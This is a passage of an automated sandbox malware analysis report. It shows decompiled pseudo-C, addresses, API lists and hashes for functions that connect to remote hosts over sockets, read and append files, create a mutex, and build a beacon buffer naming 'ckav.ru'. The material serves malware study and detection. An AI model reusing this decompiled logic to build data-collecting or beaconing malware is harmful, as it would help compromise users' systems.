                    						E0040338C(_t49, _t67, 0x104);
                    						_t74 = _t74 + 0xc;
                    					}
                    					_v28 = 0x208;
                    					_v24 = 0x208;
                    					_t7 =  &_v8; // 0x414449
                    					_v12 = _t67;
                    					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                    					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                    					__eflags = _t30;
                    					if(_t30 == 0) {
                    						_t36 = E00402B7C(_v12);
                    						_v16 = _t36;
                    						__eflags = _t36;
                    						if(_t36 != 0) {
                    							_t14 =  &_v8; // 0x414449, executed
                    							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                    							__eflags = _t37;
                    							if(_t37 != 0) {
                    								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                    								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                    								__eflags = _t40;
                    								if(__eflags != 0) {
                    									_t67 = E00405B6F(__eflags, L"%s", _t49);
                    								}
                    							}
                    							E00402BAB(_v16);
                    						}
                    					}
                    					__eflags = _v8;
                    					if(_v8 != 0) {
                    						E00403C40(_v8); // executed
                    					}
                    					__eflags = _t49;
                    					if(_t49 != 0) {
                    						E00402BAB(_t49);
                    					}
                    					_t31 = _v20;
                    					__eflags = _t31;
                    					if(_t31 != 0) {
                    						E00402BAB(_t31);
                    					}
                    					return _t67;
                    				}
                    				_t44 = GetLastError();
                    				if(_t44 == 0x3f0) {
                    					E004060AC();
                    					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                    					_t3 =  &_v8; // 0x414449
                    					_t46 =  *_t45(_t44, 8, _t3);
                    					__eflags = _t46;
                    					if(_t46 == 0) {
                    						goto L2;
                    					}
                    					goto L4;
                    				}
                    				L2:
                    				return 0;
                    			}


























                    0x004061c3
                    0x004061cb
                    0x004061cd
                    0x004061d0
                    0x004061de
                    0x004061e0
                    0x004061e5
                    0x004061e9
                    0x004061eb
                    0x004061ed
                    0x004061f2
                    0x0040622a
                    0x00406230
                    0x00406235
                    0x00406239
                    0x0040623b
                    0x00406244
                    0x00406249
                    0x00406249
                    0x0040624c
                    0x00406253
                    0x00406256
                    0x00406258
                    0x00406261
                    0x00406266
                    0x00406266
                    0x00406270
                    0x00406273
                    0x00406276
                    0x0040627b
                    0x0040627e
                    0x0040628c
                    0x0040628e
                    0x00406290
                    0x00406295
                    0x0040629a
                    0x0040629e
                    0x004062a0
                    0x004062ac
                    0x004062af
                    0x004062b7
                    0x004062b9
                    0x004062c9
                    0x004062e0
                    0x004062e2
                    0x004062e4
                    0x004062f3
                    0x004062f3
                    0x004062e4
                    0x004062f8
                    0x004062fd
                    0x004062a0
                    0x004062fe
                    0x00406302
                    0x00406307
                    0x0040630c
                    0x0040630d
                    0x0040630f
                    0x00406312
                    0x00406317
                    0x00406318
                    0x0040631c
                    0x0040631e
                    0x00406321
                    0x00406326
                    0x00000000
                    0x00406327
                    0x004061f4
                    0x004061ff
                    0x00406208
                    0x00406218
                    0x0040621d
                    0x00406224
                    0x00406226
                    0x00406228
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406228
                    0x00406201
                    0x00000000

                    APIs
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                    • _wmemset.LIBCMT ref: 00406244
                    • _wmemset.LIBCMT ref: 00406261
                    • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wmemset$ErrorInformationLastToken
                    • String ID: IDA$IDA
                    • API String ID: 487585393-2020647798
                    • Opcode ID: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                    • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                    • Opcode Fuzzy Hash: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                    • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                    C-Code - Quality: 37%
                    			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				void _v40;
                    				void* _t23;
                    				signed int _t24;
                    				signed int* _t25;
                    				signed int _t30;
                    				signed int _t31;
                    				signed int _t33;
                    				signed int _t41;
                    				void* _t42;
                    				signed int* _t43;
                    
                    				_v8 = _v8 & 0x00000000;
                    				_t33 = 8;
                    				memset( &_v40, 0, _t33 << 2);
                    				_v32 = 1;
                    				_t23 =  &_v40;
                    				_v28 = 6;
                    				_v36 = 2;
                    				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                    				if(_t23 == 0) {
                    					_t24 = E00402B7C(4);
                    					_t43 = _t24;
                    					_t31 = _t30 | 0xffffffff;
                    					 *_t43 = _t31;
                    					_t41 = _v8;
                    					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                    					 *_t43 = _t24;
                    					if(_t24 != _t31) {
                    						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                    						if(_t24 == _t31) {
                    							E00404DE5(_t24,  *_t43);
                    							 *_t43 = _t31;
                    						}
                    						__imp__freeaddrinfo(_v8);
                    						if( *_t43 != _t31) {
                    							_t25 = _t43;
                    							goto L10;
                    						} else {
                    							E00402BAB(_t43);
                    							L8:
                    							_t25 = 0;
                    							L10:
                    							return _t25;
                    						}
                    					}
                    					E00402BAB(_t43);
                    					__imp__freeaddrinfo(_v8);
                    					goto L8;
                    				}
                    				return 0;
                    			}

















                    0x00404e1d
                    0x00404e26
                    0x00404e2a
                    0x00404e2f
                    0x00404e37
                    0x00404e3a
                    0x00404e45
                    0x00404e4f
                    0x00404e57
                    0x00404e61
                    0x00404e66
                    0x00404e68
                    0x00404e6c
                    0x00404e6e
                    0x00404e7a
                    0x00404e80
                    0x00404e84
                    0x00404e9f
                    0x00404ea7
                    0x00404eab
                    0x00404eb1
                    0x00404eb1
                    0x00404eb6
                    0x00404ebe
                    0x00404ecb
                    0x00000000
                    0x00404ec0
                    0x00404ec1
                    0x00404ec7
                    0x00404ec7
                    0x00404ecd
                    0x00000000
                    0x00404ece
                    0x00404ebe
                    0x00404e87
                    0x00404e90
                    0x00000000
                    0x00404e90
                    0x00000000

                    APIs
                    • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                    • socket.WS2_32(?,?,?), ref: 00404E7A
                    • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: freeaddrinfogetaddrinfosocket
                    • String ID:
                    • API String ID: 2479546573-0
                    • Opcode ID: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                    • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                    • Opcode Fuzzy Hash: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                    • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 569 4041a9-4041b8 call 403c59 562->569 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 569->576 577 4041db-4041e4 call 402bab 569->577 570->571 575 40411b-404120 570->575 574 40417d-40417e call 403c40 571->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->571 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                    C-Code - Quality: 74%
                    			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                    				struct _SECURITY_ATTRIBUTES* _v8;
                    				char _v12;
                    				long _v16;
                    				void* __ebx;
                    				void* __edi;
                    				void* _t16;
                    				intOrPtr* _t25;
                    				long* _t28;
                    				void* _t30;
                    				int _t32;
                    				intOrPtr* _t33;
                    				void* _t35;
                    				void* _t42;
                    				intOrPtr _t43;
                    				long _t44;
                    				struct _OVERLAPPED* _t46;
                    
                    				_t46 = 0;
                    				_t35 = 0;
                    				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                    				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                    				_t42 = _t16;
                    				_v8 = _t42;
                    				if(_t42 == 0xffffffff) {
                    					__eflags = _a12;
                    					if(_a12 == 0) {
                    						L10:
                    						return _t35;
                    					}
                    					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                    					__eflags = _t43;
                    					if(_t43 == 0) {
                    						goto L10;
                    					}
                    					_push(0);
                    					__eflags = E00403C59(_a4, _t43);
                    					if(__eflags != 0) {
                    						_v8 = 0;
                    						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                    						_push(_t43);
                    						 *_a8 = _v8;
                    						E00403D44();
                    					}
                    					E00402BAB(_t43);
                    					return _t46;
                    				}
                    				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                    				_t44 =  *_t25(_t42,  &_v12);
                    				if(_v12 != 0 || _t44 > 0x40000000) {
                    					L8:
                    					_t45 = _v8;
                    					goto L9;
                    				} else {
                    					_t28 = _a8;
                    					if(_t28 != 0) {
                    						 *_t28 = _t44;
                    					}
                    					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                    					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                    					_t35 = _t30;
                    					if(_t35 == 0) {
                    						goto L8;
                    					} else {
                    						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                    						_t45 = _v8;
                    						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                    						if(_t32 == 0) {
                    							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                    							 *_t33(_t35, _t46, 0x8000);
                    							_t35 = _t46;
                    						}
                    						L9:
                    						E00403C40(_t45); // executed
                    						goto L10;
                    					}
                    				}
                    			}



















                    0x004040c4
                    0x004040ce
                    0x004040d0
                    0x004040e8
                    0x004040ea
                    0x004040ec
                    0x004040f2
                    0x0040418d
                    0x00404190
                    0x00404184
                    0x00000000
                    0x00404184
                    0x004041a0
                    0x004041a5
                    0x004041a7
                    0x00000000
                    0x00000000
                    0x004041a9
                    0x004041b6
                    0x004041b8
                    0x004041be
                    0x004041cb
                    0x004041d0
                    0x004041d1
                    0x004041d3
                    0x004041d8
                    0x004041dc
                    0x00000000
                    0x004041e2
                    0x00404100
                    0x0040410c
                    0x00404111
                    0x0040417a
                    0x0040417a
                    0x00000000
                    0x0040411b
                    0x0040411b
                    0x00404120
                    0x00404122
                    0x00404122
                    0x0040412c
                    0x0040413a
                    0x0040413c
                    0x00404140
                    0x00000000
                    0x00404142
                    0x0040414a
                    0x00404155
                    0x0040415a
                    0x0040415e
                    0x00404168
                    0x00404174
                    0x00404176
                    0x00404176
                    0x0040417d
                    0x0040417e
                    0x00000000
                    0x00404183
                    0x00404140

                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateReadVirtual
                    • String ID: .tmp
                    • API String ID: 3585551309-2986845003
                    • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                    • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                    • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                    • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E00413866(void* __eflags) {
                    				short _v6;
                    				short _v8;
                    				short _v10;
                    				short _v12;
                    				short _v14;
                    				short _v16;
                    				short _v18;
                    				short _v20;
                    				short _v22;
                    				char _v24;
                    				short _v28;
                    				short _v30;
                    				short _v32;
                    				short _v34;
                    				short _v36;
                    				short _v38;
                    				short _v40;
                    				short _v42;
                    				short _v44;
                    				short _v46;
                    				char _v48;
                    				short _v52;
                    				short _v54;
                    				short _v56;
                    				short _v58;
                    				short _v60;
                    				short _v62;
                    				short _v64;
                    				short _v66;
                    				short _v68;
                    				short _v70;
                    				short _v72;
                    				short _v74;
                    				char _v76;
                    				void* __ebx;
                    				void* __edi;
                    				void* _t38;
                    				short _t43;
                    				short _t44;
                    				short _t45;
                    				short _t46;
                    				short _t47;
                    				short _t48;
                    				short _t50;
                    				short _t51;
                    				short _t52;
                    				short _t54;
                    				short _t55;
                    				intOrPtr* _t57;
                    				intOrPtr* _t59;
                    				intOrPtr* _t61;
                    				void* _t63;
                    				WCHAR* _t65;
                    				long _t68;
                    				void* _t75;
                    				short _t76;
                    				short _t78;
                    				short _t83;
                    				short _t84;
                    				short _t85;
                    
                    				E00402C6C(_t38);
                    				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                    				SetErrorMode(3); // executed
                    				_t43 = 0x4f;
                    				_v76 = _t43;
                    				_t44 = 0x4c;
                    				_v74 = _t44;
                    				_t45 = 0x45;
                    				_v72 = _t45;
                    				_t46 = 0x41;
                    				_v70 = _t46;
                    				_t47 = 0x55;
                    				_v68 = _t47;
                    				_t48 = 0x54;
                    				_t76 = 0x33;
                    				_t84 = 0x32;
                    				_t83 = 0x2e;
                    				_t78 = 0x64;
                    				_t85 = 0x6c;
                    				_v66 = _t48;
                    				_v52 = 0;
                    				_t50 = 0x77;
                    				_v48 = _t50;
                    				_t51 = 0x73;
                    				_v46 = _t51;
                    				_t52 = 0x5f;
                    				_v42 = _t52;
                    				_v28 = 0;
                    				_t54 = 0x6f;
                    				_v24 = _t54;
                    				_t55 = 0x65;
                    				_v20 = _t55;
                    				_v64 = _t76;
                    				_v62 = _t84;
                    				_v60 = _t83;
                    				_v58 = _t78;
                    				_v56 = _t85;
                    				_v54 = _t85;
                    				_v44 = _t84;
                    				_v40 = _t76;
                    				_v38 = _t84;
                    				_v36 = _t83;
                    				_v34 = _t78;
                    				_v32 = _t85;
                    				_v30 = _t85;
                    				_v22 = _t85;
                    				_v18 = _t76;
                    				_v16 = _t84;
                    				_v14 = _t83;
                    				_v12 = _t78;
                    				_v10 = _t85;
                    				_v8 = _t85;
                    				_v6 = 0;
                    				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                    				 *_t57( &_v76);
                    				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                    				 *_t59( &_v48);
                    				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                    				_t81 =  &_v24;
                    				 *_t61( &_v24); // executed
                    				_t63 = E00414059(); // executed
                    				if(_t63 != 0) {
                    					_t65 = E00413D97(0);
                    					E004031E5(0, 0, 0xcf167df4, 0, 0);
                    					CreateMutexW(0, 1, _t65); // executed
                    					_t68 = GetLastError();
                    					_t92 = _t68 - 0xb7;
                    					if(_t68 == 0xb7) {
                    						E00413B81(0);
                    						_pop(_t81); // executed
                    					}
                    					E00413003(_t92); // executed
                    					E00412B2E(_t92); // executed
                    					E00412D31(_t81, _t84); // executed
                    					E00413B3F();
                    					E00413B81(0);
                    					 *0x49fdd0 = 1;
                    				}
                    				return 0;
                    			}































































                    0x0041386f
                    0x0041387e
                    0x00413885
                    0x00413889
                    0x0041388c
                    0x00413890
                    0x00413893
                    0x00413897
                    0x0041389a
                    0x0041389e
                    0x004138a1
                    0x004138a5
                    0x004138a8
                    0x004138ac
                    0x004138af
                    0x004138b2
                    0x004138b5
                    0x004138b8
                    0x004138bb
                    0x004138bc
                    0x004138c4
                    0x004138c8
                    0x004138cb
                    0x004138cf
                    0x004138d2
                    0x004138d6
                    0x004138d7
                    0x004138df
                    0x004138e3
                    0x004138e4
                    0x004138ea
                    0x004138eb
                    0x004138f1
                    0x004138f5
                    0x004138f9
                    0x004138fd
                    0x00413901
                    0x00413905
                    0x00413909
                    0x0041390d
                    0x00413911
                    0x00413915
                    0x00413919
                    0x0041391d
                    0x00413921
                    0x00413925
                    0x00413929
                    0x0041392d
                    0x00413931
                    0x00413935
                    0x00413939
                    0x0041393d
                    0x00413941
                    0x00413950
                    0x00413959
                    0x0041395f
                    0x00413968
                    0x0041396e
                    0x00413973
                    0x00413977
                    0x00413979
                    0x00413980
                    0x00413982
                    0x00413991
                    0x0041399c
                    0x0041399e
                    0x004139a4
                    0x004139a9
                    0x004139ac
                    0x004139b1
                    0x004139b1
                    0x004139b2
                    0x004139b7
                    0x004139bc
                    0x004139c1
                    0x004139c7
                    0x004139cd
                    0x004139cd
                    0x004139db

                    APIs
                    • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                    • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                    • GetLastError.KERNEL32 ref: 0041399E
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: Error$CreateLastModeMutex
                    • String ID:
                    • API String ID: 3448925889-0
                    • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                    • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                    				long _v8;
                    				void* _t7;
                    				long _t10;
                    				void* _t21;
                    				struct _OVERLAPPED* _t24;
                    
                    				_t14 = __ebx;
                    				_t24 = 0;
                    				_v8 = 0;
                    				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                    				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                    				_t21 = _t7;
                    				if(_t21 != 0xffffffff) {
                    					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                    					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                    					if(_t10 != 0xffffffff) {
                    						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                    						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                    						_t24 =  !=  ? 1 : 0;
                    					}
                    					E00403C40(_t21); // executed
                    				}
                    				return _t24;
                    			}








                    0x004042cf
                    0x004042d5
                    0x004042df
                    0x004042e2
                    0x004042f9
                    0x004042fb
                    0x00404300
                    0x0040430a
                    0x00404314
                    0x00404319
                    0x00404323
                    0x00404334
                    0x0040433b
                    0x0040433b
                    0x0040433f
                    0x00404344
                    0x0040434c

                    APIs
                    • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                    • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreatePointerWrite
                    • String ID:
                    • API String ID: 3672724799-0
                    • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                    • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 34%
                    			E00412D31(void* __ecx, void* __edi) {
                    				long _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				char _v24;
                    				char _v40;
                    				void* __ebx;
                    				intOrPtr* _t10;
                    				void* _t11;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    				void* _t35;
                    				void* _t53;
                    				char* _t57;
                    				void* _t58;
                    				void* _t61;
                    				void* _t64;
                    				void* _t65;
                    				intOrPtr* _t66;
                    				void* _t67;
                    				void* _t68;
                    				void* _t69;
                    				void* _t70;
                    				void* _t71;
                    				void* _t72;
                    				void* _t73;
                    
                    				_t53 = __ecx;
                    				_t10 =  *0x49fde0;
                    				_t68 = _t67 - 0x24;
                    				 *0x49fddc = 0x927c0;
                    				 *0x49fde4 = 0;
                    				_t75 = _t10;
                    				if(_t10 != 0) {
                    					L16:
                    					_push(1);
                    					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                    					_t61 = _t11;
                    					_t68 = _t68 + 0xc;
                    					if(_t61 != 0) {
                    						E004031E5(0, 0, 0xfcae4162, 0, 0);
                    						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                    					}
                    					L004067C4(0xea60); // executed
                    					_pop(_t53);
                    				} else {
                    					_push(__edi);
                    					 *0x49fde0 = E004056BF(0x2bc);
                    					E00413DB7(_t53, _t75,  &_v40);
                    					_t57 =  &_v24;
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					E004058D4( *0x49fde0, 0x12);
                    					E004058D4( *0x49fde0, 0x28);
                    					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                    					_t69 = _t68 + 0x28;
                    					_t64 = E0040632F();
                    					_push(0);
                    					_push(1);
                    					if(_t64 == 0) {
                    						_push(0);
                    						_push( *0x49fde0);
                    						E00405872();
                    						_t70 = _t69 + 0x10;
                    					} else {
                    						_push(_t64);
                    						_push( *0x49fde0);
                    						E00405872();
                    						E00402BAB(_t64);
                    						_t70 = _t69 + 0x14;
                    					}
                    					_t58 = E00406130(_t57);
                    					_push(0);
                    					_push(1);
                    					_t77 = _t64;
                    					if(_t64 == 0) {
                    						_push(0);
                    						_push( *0x49fde0);
                    						_t25 = E00405872();
                    						_t71 = _t70 + 0x10; // executed
                    					} else {
                    						_push(_t58);
                    						_push( *0x49fde0);
                    						E00405872();
                    						_t25 = E00402BAB(_t58);
                    						_t71 = _t70 + 0x14;
                    					}
                    					_t26 = E004061C3(_t25, 0, _t77); // executed
                    					_t65 = _t26;
                    					_push(0);
                    					_push(1);
                    					if(_t65 == 0) {
                    						_push(0);
                    						_push( *0x49fde0);
                    						_t27 = E00405872();
                    						_t72 = _t71 + 0x10;
                    					} else {
                    						_push(_t65);
                    						_push( *0x49fde0);
                    						E00405872();
                    						_t27 = E00402BAB(_t65);
                    						_t72 = _t71 + 0x14;
                    					}
                    					_t66 = E00406189(_t27);
                    					_t79 = _t66;
                    					if(_t66 == 0) {
                    						E00405781( *0x49fde0, 0);
                    						E00405781( *0x49fde0, 0);
                    						_t73 = _t72 + 0x10;
                    					} else {
                    						E00405781( *0x49fde0,  *_t66);
                    						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                    						E00402BAB(_t66);
                    						_t73 = _t72 + 0x14;
                    					}
                    					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                    					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                    					_t35 = E0040642C(_t79); // executed
                    					E004058D4( *0x49fde0, _t35);
                    					E004058D4( *0x49fde0, _v24);
                    					E004058D4( *0x49fde0, _v20);
                    					E004058D4( *0x49fde0, _v16);
                    					E004058D4( *0x49fde0, _v12);
                    					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                    					_t68 = _t73 + 0x48;
                    				}
                    				_t80 =  *0x49fde4;
                    				if( *0x49fde4 == 0) {
                    					_t10 =  *0x49fde0;
                    					goto L16;
                    				}
                    				return E00405695(_t53,  *0x49fde0);
                    			}






























                    0x00412d31
                    0x00412d34
                    0x00412d39
                    0x00412d3c
                    0x00412d49
                    0x00412d50
                    0x00412d52
                    0x00412f24
                    0x00412f24
                    0x00412f2b
                    0x00412f30
                    0x00412f32
                    0x00412f37
                    0x00412f41
                    0x00412f53
                    0x00412f53
                    0x00412f5b
                    0x00412f60
                    0x00412d58
                    0x00412d58
                    0x00412d63
                    0x00412d6c
                    0x00412d73
                    0x00412d7e
                    0x00412d7f
                    0x00412d80
                    0x00412d81
                    0x00412d82
                    0x00412d8f
                    0x00412da1
                    0x00412da6
                    0x00412dae
                    0x00412db0
                    0x00412db1
                    0x00412db5
                    0x00412dce
                    0x00412dcf
                    0x00412dd5
                    0x00412dda
                    0x00412db7
                    0x00412db7
                    0x00412db8
                    0x00412dbe
                    0x00412dc4
                    0x00412dc9
                    0x00412dc9
                    0x00412de2
                    0x00412de4
                    0x00412de5
                    0x00412de7
                    0x00412de9
                    0x00412e02
                    0x00412e03
                    0x00412e09
                    0x00412e0e
                    0x00412deb
                    0x00412deb
                    0x00412dec
                    0x00412df2
                    0x00412df8
                    0x00412dfd
                    0x00412dfd
                    0x00412e11
                    0x00412e17
                    0x00412e19
                    0x00412e1a
                    0x00412e1e
                    0x00412e37
                    0x00412e38
                    0x00412e3e
                    0x00412e43
                    0x00412e20
                    0x00412e20
                    0x00412e21
                    0x00412e27
                    0x00412e2d
                    0x00412e32
                    0x00412e32
                    0x00412e4b
                    0x00412e4d
                    0x00412e4f
                    0x00412e7e
                    0x00412e8a
                    0x00412e8f
                    0x00412e51
                    0x00412e59
                    0x00412e67
                    0x00412e6d
                    0x00412e72
                    0x00412e72
                    0x00412e9e
                    0x00412eaf
                    0x00412eb4
                    0x00412ec0
                    0x00412ece
                    0x00412edc
                    0x00412eea
                    0x00412ef8
                    0x00412f0f
                    0x00412f14
                    0x00412f14
                    0x00412f17
                    0x00412f1d
                    0x00412f1f
                    0x00000000
                    0x00412f1f
                    0x00412f74

                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                      • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                      • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                      • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
